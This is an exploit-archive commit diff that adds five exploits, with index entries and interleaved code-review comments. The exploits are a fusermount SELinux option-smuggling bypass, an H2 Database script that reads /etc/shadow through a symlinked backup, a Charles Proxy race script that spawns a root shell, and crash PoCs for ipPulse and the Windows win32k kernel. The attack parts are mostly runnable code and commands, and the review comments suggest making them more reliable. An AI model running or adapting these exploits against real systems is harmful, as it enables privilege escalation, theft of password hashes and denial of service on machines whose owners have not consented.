DB: 2018-07-31
5 changes to exploits/shellcodes

fusermount - user_allow_other Restriction Bypass and SELinux Label Control
ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
Charles Proxy 4.2 - Local Privilege Escalation
H2 Database 1.4.197 - Information Disclosure
parent 582d8f748e
commit b02440845e
6 changed files with 357 additions and 0 deletions
exploits/linux/dos/45106.c (Normal file, 100 lines)
@ -0,0 +1,100 @@
/*
It is possible to bypass fusermount's restrictions on the use of the
"allow_other" mount option as follows if SELinux is active.

Here's a minimal demo, tested on a Debian system with SELinux enabled in
permissive mode:

===============================================
uuser@debian:~$ mount|grep /mount
user@debian:~$ grep user_allow_other /etc/fuse.conf
#user_allow_other
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
sending file descriptor: Bad file descriptor
user@debian:~$ mount|grep /mount
/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
===============================================

Here's a demo that actually mounts a real FUSE filesystem with allow_other,
again on a Debian system configured to use SELinux:
===============================================
user@debian:~$ cat fuse-shim.c
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int execv(const char *path, char *const argv_[]) {
char **argv = (void*)argv_; /* cast away const */
for (char **argvp = argv; *argvp != NULL; argvp++) {
char *arg = *argvp;
for (char *p = arg; *p; p++) {
if (*p == '#') *p = '\\';
}
}
int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
execv_real(path, argv_);
}

/*
user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
user@debian:~$ echo hello world > hello.txt
user@debian:~$ zip hello.zip hello.txt
adding: hello.txt (stored 0%)
user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
user@debian:~$ mount|grep /mount
fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
user@debian:~$ sudo bash
root@debian:/home/user# ls -laZ mount
total 5
drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 .
drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 ..
-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt
root@debian:/home/user# cat mount/hello.txt
hello world
===============================================


I have tested that this also works on Fedora (which, unlike Debian, has SELinux
enabled by default.)


Unfortunately, I only noticed that this was possible after I publicly sent some
fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
when the maintainer asked a question about one of the patches.


Breaking down the attack, the problems are:

1. fusermount's do_mount() is written as if backslashes escape commas in mount
options; however, this is only true for the "fsname" and "subtype"
pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
filesystem follow those semantics. This means that an attacker can smuggle
a forbidden option through fusermount's checks if the previous option ends
with a backslash. However, no option accepted by the FUSE filesystem can end
with a backslash, so this seemed unexploitable at first.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
the mount options understood by the SELinux and Smack LSMs. LSMs have the
opportunity to grab mount options and make them invisible to the actual
filesystem through the security_sb_copy_data() security hook.
For this attack, I'm using the "context" option.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
3. The SELinux LSM is slightly lax about parsing the level component of SELinux
context strings when the policy uses Multi-Level Security (MLS).
When using MLS, the format of a context string is
"<user>:<role>:<type>:<level>"; the level component is parsed by
mls_context_to_sid(). The level component is supposed to specify a
sensitivity range (one or two parts delimited with '-'); each part of the
range may be followed by ':' and a category set specification.
If the sensitivity range consists of two parts and the second part of the
range is followed by a category set, the function incorrectly marks a
trailing '-' and any following data until ':' or '\0' as consumed, but does
not actually parse this data. This allows an attacker to smuggle a backslash
through.
*/
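Review bot: the `execv` wrapper in fuse-shim.c is declared `int` but never returns: after `execv_real(path, argv_);` control falls off the end of the function, which is undefined behaviour on the only path that ever gets there (execv returns only when it fails), and the `dlsym(RTLD_NEXT, "execv")` result is called without a NULL check. Suggest `if (!execv_real) abort();` followed by `return execv_real(path, argv_);`. Smaller points: the first transcript line reads `uuser@debian` (typo), and unlike the other files in this commit the header carries no author, date or "fixed in" fields, so the remediation (the two libfuse PR 268 commits named under points 1 and 2, and the `mls_context_to_sid()` parsing issue under point 3) is only discoverable by reading to the end; a short header block would help anyone triaging this entry.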
exploits/linux/webapps/45105.py (Executable file, 68 lines)
@ -0,0 +1,68 @@
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335

# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.

# PS, thanks to HTB and our team FallenAngels

#!/usr/bin/python

import requests
import argparse
import os
import random

def cleanup(wdir):
cmd = "rm {}symlink.trace.db".format(wdir)
os.system(cmd)

def create_symlink(file, wdir):
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
os.system(cmd)


def trigger_symlink(host, wdir):
outputName = str(random.randint(1000,10000))+".zip"
#get cookie
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
url = '{}/{}'.format(url,path)
payload = {
"tool":"Backup",
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
#print url
requests.post(url,data=payload).text
print "File is zipped in: "+wdir+outputName

if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:8082',
help="Target host",
required=True)
required.add_argument("-D",
"--dir",
metavar="/tmp/",
default="/tmp/",
help="Writable directory")
required.add_argument("-F",
"--file",
metavar="/etc/shadow",
default="/etc/shadow",
help="Desired file to read",)
args = parser.parse_args()

create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)
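Review bot: the `#!/usr/bin/python` shebang sits on line 17 of the file, after the header comments, so the kernel never sees it and the executable bit this file is committed with does nothing; move it to line 1. In `trigger_symlink`, `r.text.split('href = ')[1]` raises IndexError whenever the console's landing page does not contain that exact string, and the result of `requests.post(url, data=payload)` is discarded, so a rejected backup still prints "File is zipped in"; check the status code and response body before reporting success. `cleanup` removes `symlink.trace.db` but leaves the generated ZIP in the writable directory, the two `os.system` calls interpolate `file` and `wdir` unquoted (`os.symlink` and `os.remove` avoid the shell entirely), and `print` as a statement pins the script to Python 2 with no note in the header.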
exploits/macos/local/45107.txt (Normal file, 80 lines)
@ -0,0 +1,80 @@
Charles Proxy is a great mac application for debugging web services and
inspecting SSL traffic for any application on your machine.

In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.

Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:

/Applications/Charles.app/Contents/Resources/Charles Proxy Settings

Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.

It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.

This issue was fixed in Charles 4.2.1 released in November 2017.

https://m4.rkw.io/charles_4.2.sh.txt
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
-------------------------------------------------------------------------------
#!/bin/bash

####################################################
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
####################################################

cd
user="`whoami`"

cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
return 0;
}
EOF

gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
echo "failed to compile the exploit, you need xcode cli tools for this."
exit 1
fi
rm -f charles_exploit.c

ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings

i=0

while :
do
r=`ls -la Charles\ Proxy\ Settings |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq 10 ] ; then
rm -f Charles\ Proxy\ Settings
echo "Not vulnerable"
exit 1
fi
done

./Charles\ Proxy\ Settings
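Review bot: the compiled payload removes `/Users/$user/Charles Proxy Settings`, but the script placed the replacement binary with a bare `cd`, i.e. in `$HOME`; on a system where HOME is not `/Users/$user` the setuid-root copy is never cleaned up and stays on disk after the script finishes. Use `$HOME` in both places. The readiness check `ls -la ... | grep root` matches any "root" in the listing rather than the owner column specifically, and the loop prints "Not vulnerable" after 10 iterations of 0.1 s, which conflates a slow `--self-repair` with a patched binary; worth noting in the write-up. The bare hash line under the URL should be labelled (sha256 of the hosted script) so readers know what it covers.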
exploits/windows/dos/45102.py (Executable file, 26 lines)
@ -0,0 +1,26 @@
# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-07-27
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Target Editor
# 5.- Paste ClipBoard on "IP Address/HostName"
# 6.- Paste ClipBoard on "Comment"
# 7.- Add Above Fields to Target List >>
# 8.- OK
# 9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 3400
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()
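Review bot: as in 45105.py, `#!/usr/bin/env python` comes after the header comments and therefore has no effect even though the file is committed with the executable bit; put it on line 1. Step 1 of the reproduction says `python ipPulse_1.92.py`, but the file is stored as `45102.py`; update the step or note the rename. `buffer` shadows a Python 2 built-in (`payload` is clearer), and `with open("ipPulse_1.92.txt", "w") as f:` would replace the manual `close()`.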
exploits/windows/dos/45104.c (Normal file, 78 lines)
@ -0,0 +1,78 @@
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A

# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
# call NtUserConsoleControl with the following arguments:

# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).

# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e mov ecx,dword ptr [esi]

# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
# Resetting default scope

# CUSTOMER_CRASH_COUNT: 1
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
# BUGCHECK_STR: 0x8E
# PROCESS_NAME: Win32k-fuzzer_

# CURRENT_IRQL: 0
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641

# STACK_TEXT:
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766

# PoC code:

#include <Windows.h>

extern "C"

ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}


int _tmain(int argc, _TCHAR* argv[])
{

int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7

LoadLibrary(L"user32.dll");

st = (int)SystemCall32(syscall_ID, 4, 0, 8);

return 0;
}

# The vulnerability has only been tested in Windows 7 x86.
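Review bot: the file does not compile as stored: the `# Exploit Title:` header block, the crash dump and the closing `# The vulnerability has only been tested ...` line are `#` lines, which the C/C++ preprocessor rejects as unknown directives; convert them to `//` or `/* */` comments. `extern "C"` and the `__asm { }` blocks mean this is MSVC C++ for x86 only, and `_tmain`/`_TCHAR` need `#include <tchar.h>`, which is absent. `SystemCall32` is declared `ULONG` but contains no `return`; it relies on whatever `int 0x2e` leaves in eax, which deserves a comment since `st` is then assigned and never used. Naming is inconsistent: the title, the header sentence and the stack trace say `NtUserConsoleControl`, while the six argument tuples and the `syscall_ID` comment say `NtUserControlConsole`; pick one. The crash text is a Spanish-locale WinDbg message with a dropped character (`instrucci n`); worth noting the locale so the garbled accent is not mistaken for corruption.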
@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
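Review bot: the new 45106 row is inserted between 44965 (2018-07-02) and 44972 (2018-07-03), breaking the id and date ordering the surrounding rows follow; the other three rows added in this commit go at the end of their section, so this one belongs after 45104 in the dos block (next hunk). The author field says "Google Security Research" while 45106.c itself carries no author or date header, so the attribution cannot be checked against the file; adding a header to the file would close that gap.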
@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port
45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows,
45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
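Review bot: the 45102 row credits "Luis Martínez" (matching the neighbouring 45092 and 45095 rows) while the file header says "Luis Martinez" without the accent; align the file header with the CSV so searches on either spelling find both. The 45104 row's title uses `NtUserConsoleControl`, which matches the file's title line but not the `NtUserControlConsole` spelling used in its body; the CSV is right, the file should be fixed.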
@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
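Review bot: the 45107 row names the author "Mark Wadham", but 45107.txt is signed only "m4rkw" with the blog URL https://m4.rkw.io/blog.html; the handle-to-name mapping is not visible anywhere in this commit, so either add the real name to the file header or carry the handle in the CSV as the other rows do (absolomb, neonsea).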
@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
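Review bot: the 45105 row leaves the port column empty although the file's own usage example targets the H2 console on 127.0.0.1:8082; the sibling rows in this hunk set the port where one is known (45088 has 80), so 8082 would be consistent. Unrelated but visible in the context lines: row 45088 spells "Corss-Site", a pre-existing typo worth a separate fix.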